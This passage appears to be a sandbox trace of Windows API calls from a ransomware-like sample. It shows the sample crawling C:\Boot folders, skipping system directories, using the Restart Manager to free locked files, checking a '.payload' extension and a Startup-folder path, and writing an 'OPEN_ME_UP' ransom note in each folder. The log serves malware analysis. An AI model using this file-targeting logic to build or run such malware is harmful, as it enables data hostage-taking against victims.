returned 0 [0081.390] FindNextFileW (in: hFindFile=0x606620, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc487a0b9, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0081.390] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.390] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.390] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.390] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.390] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.390] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-CA\\..") returned 20 [0081.390] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.390] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.390] FindNextFileW (in: hFindFile=0x606620, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0081.390] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0081.390] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0081.390] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0081.390] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0081.390] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0081.391] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-CA\\bootmgr.exe.mui") returned 33 [0081.391] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".payload") returned 0x0 [0081.391] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.391] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0081.391] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\fr-CA\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0081.391] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-CA\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-ca\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0081.391] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0081.391] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0081.391] RmStartSession () returned 0x0 [0081.406] RmRegisterResources () returned 0x0 [0081.412] RmGetList () returned 0x0 [0081.527] RmEndSession () returned 0x0 [0081.644] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0081.644] FindNextFileW (in: hFindFile=0x606620, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0081.644] FindClose (in: hFindFile=0x606620 | out: hFindFile=0x606620) returned 1 [0081.644] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-CA\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0081.645] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-CA\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\fr-ca\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0081.645] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0081.646] CloseHandle (hObject=0x430) returned 1 [0081.646] GetProcessHeap () returned 0x5e0000 [0081.646] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60ec60 | out: hHeap=0x5e0000) returned 1 [0081.646] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0081.646] lstrcmpiW (lpString1="fr-FR", lpString2="Windows") returned -1 [0081.646] lstrcmpiW (lpString1="fr-FR", lpString2="$Recycle.bin") returned 1 [0081.646] lstrcmpiW (lpString1="fr-FR", lpString2="System Volume Information") returned -1 [0081.646] lstrcmpiW (lpString1="fr-FR", lpString2="Program Files") returned -1 [0081.646] lstrcmpiW (lpString1="fr-FR", lpString2="Program Files (x86)") returned -1 [0081.646] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR") returned 17 [0081.646] lstrcmpW (lpString1="fr-FR", lpString2=".") returned 1 [0081.646] lstrcmpW (lpString1="fr-FR", lpString2="..") returned 1 [0081.646] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\fr-FR", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0081.647] GetProcessHeap () returned 0x5e0000 [0081.647] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60ec60 [0081.647] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\*") returned 19 [0081.647] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fr-FR\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x606360 [0081.647] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.647] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.647] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.647] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.647] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.647] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\.") returned 19 [0081.647] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.647] FindNextFileW (in: hFindFile=0x606360, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0081.647] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.647] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.647] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.647] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.647] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.647] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\..") returned 20 [0081.647] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.647] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.647] FindNextFileW (in: hFindFile=0x606360, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2096e751, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13558, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0081.647] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0081.647] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0081.647] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0081.647] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0081.647] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0081.647] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 33 [0081.647] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".payload") returned 0x0 [0081.647] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.648] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0081.648] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0081.648] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0081.648] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0081.648] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0081.648] RmStartSession () returned 0x0 [0081.698] RmRegisterResources () returned 0x0 [0081.703] RmGetList () returned 0x0 [0081.940] RmEndSession () returned 0x0 [0081.998] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0081.998] FindNextFileW (in: hFindFile=0x606360, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ade2b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0081.998] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Windows") returned -1 [0081.998] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="$Recycle.bin") returned 1 [0081.998] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="System Volume Information") returned -1 [0081.998] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files") returned -1 [0081.998] lstrcmpiW (lpString1="memtest.exe.mui", lpString2="Program Files (x86)") returned -1 [0081.998] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\memtest.exe.mui") returned 33 [0081.998] StrStrIW (lpFirst="memtest.exe.mui", lpSrch=".payload") returned 0x0 [0081.998] lstrcmpW (lpString1="memtest.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0081.998] lstrcmpW (lpString1="memtest.exe.mui", lpString2="taridd") returned -1 [0081.998] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\fr-FR\\memtest.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0081.998] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\memtest.exe.mui" (normalized: "c:\\boot\\fr-fr\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0081.999] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0081.999] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0081.999] RmStartSession () returned 0x0 [0082.001] RmRegisterResources () returned 0x0 [0082.026] RmGetList () returned 0x0 [0082.184] RmEndSession () returned 0x0 [0082.241] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0082.242] FindNextFileW (in: hFindFile=0x606360, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ade2b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0082.242] FindClose (in: hFindFile=0x606360 | out: hFindFile=0x606360) returned 1 [0082.242] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0082.242] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\fr-fr\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.251] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0082.252] CloseHandle (hObject=0x430) returned 1 [0082.252] GetProcessHeap () returned 0x5e0000 [0082.252] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60ec60 | out: hHeap=0x5e0000) returned 1 [0082.252] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0082.252] lstrcmpiW (lpString1="hr-HR", lpString2="Windows") returned -1 [0082.252] lstrcmpiW (lpString1="hr-HR", lpString2="$Recycle.bin") returned 1 [0082.252] lstrcmpiW (lpString1="hr-HR", lpString2="System Volume Information") returned -1 [0082.252] lstrcmpiW (lpString1="hr-HR", lpString2="Program Files") returned -1 [0082.252] lstrcmpiW (lpString1="hr-HR", lpString2="Program Files (x86)") returned -1 [0082.253] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hr-HR") returned 17 [0082.253] lstrcmpW (lpString1="hr-HR", lpString2=".") returned 1 [0082.253] lstrcmpW (lpString1="hr-HR", lpString2="..") returned 1 [0082.253] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\hr-HR", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0082.253] GetProcessHeap () returned 0x5e0000 [0082.253] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60ec60 [0082.253] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\hr-HR\\*") returned 19 [0082.253] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\hr-HR\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x6063e0 [0082.253] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0082.253] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0082.253] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0082.253] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0082.253] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0082.253] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hr-HR\\.") returned 19 [0082.253] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0082.253] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0082.253] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0082.253] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0082.253] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0082.253] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0082.253] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0082.253] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hr-HR\\..") returned 20 [0082.253] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0082.253] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0082.253] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0082.253] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Windows") returned -1 [0082.253] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="$Recycle.bin") returned 1 [0082.253] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="System Volume Information") returned -1 [0082.254] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files") returned -1 [0082.254] lstrcmpiW (lpString1="bootmgr.exe.mui", lpString2="Program Files (x86)") returned -1 [0082.254] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hr-HR\\bootmgr.exe.mui") returned 33 [0082.254] StrStrIW (lpFirst="bootmgr.exe.mui", lpSrch=".payload") returned 0x0 [0082.254] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0082.254] lstrcmpW (lpString1="bootmgr.exe.mui", lpString2="taridd") returned -1 [0082.254] StrCmpNW (lpStr1="\\\\?\\C:\\Boot\\hr-HR\\bootmgr.exe.mui", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\WNLue3jw5Zpc48Utrqm", nChar=97) returned -1 [0082.254] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hr-HR\\bootmgr.exe.mui" (normalized: "c:\\boot\\hr-hr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0082.254] UuidCreate (in: Uuid=0x342f6e4 | out: Uuid=0x342f6e4) returned 0x0 [0082.254] UuidToStringW (in: Uuid=0x342f6e4, StringUuid=0x342f6fc | out: StringUuid=0x342f6fc) returned 0x0 [0082.254] RmStartSession () returned 0x0 [0082.256] RmRegisterResources () returned 0x0 [0082.261] RmGetList () returned 0x0 [0082.354] RmEndSession () returned 0x0 [0082.451] RpcStringFreeW (in: String=0x342f6fc | out: String=0x342f6fc) returned 0x0 [0082.452] FindNextFileW (in: hFindFile=0x6063e0, lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0082.452] FindClose (in: hFindFile=0x6063e0 | out: hFindFile=0x6063e0) returned 1 [0082.452] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hr-HR\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 49 [0082.452] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\hr-HR\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\boot\\hr-hr\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0082.453] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x3a6, lpNumberOfBytesWritten=0x342f7ec, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x342f7ec*=0x3a6, lpOverlapped=0x0) returned 1 [0082.453] CloseHandle (hObject=0x430) returned 1 [0082.454] GetProcessHeap () returned 0x5e0000 [0082.454] HeapFree (in: hHeap=0x5e0000, dwFlags=0x8, lpMem=0x60ec60 | out: hHeap=0x5e0000) returned 1 [0082.454] FindNextFileW (in: hFindFile=0x606be0, lpFindFileData=0x342faa8 | out: lpFindFileData=0x342faa8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0082.454] lstrcmpiW (lpString1="hu-HU", lpString2="Windows") returned -1 [0082.454] lstrcmpiW (lpString1="hu-HU", lpString2="$Recycle.bin") returned 1 [0082.454] lstrcmpiW (lpString1="hu-HU", lpString2="System Volume Information") returned -1 [0082.454] lstrcmpiW (lpString1="hu-HU", lpString2="Program Files") returned -1 [0082.454] lstrcmpiW (lpString1="hu-HU", lpString2="Program Files (x86)") returned -1 [0082.454] wnsprintfW (in: pszDest=0x624df8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU") returned 17 [0082.454] lstrcmpW (lpString1="hu-HU", lpString2=".") returned 1 [0082.454] lstrcmpW (lpString1="hu-HU", lpString2="..") returned 1 [0082.454] lstrcmpW (lpString1="\\\\?\\C:\\Boot\\hu-HU", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0082.454] GetProcessHeap () returned 0x5e0000 [0082.454] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x400) returned 0x60ec60 [0082.454] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU\\*") returned 19 [0082.454] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\hu-HU\\*", lpFindFileData=0x342f820 | out: lpFindFileData=0x342f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0x6064a0 [0082.454] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0082.454] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0082.454] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0082.454] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0082.454] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0082.454] wnsprintfW (in: pszDest=0x60ec60, cchDest=512, pszFmt="%s\\%s" | out: 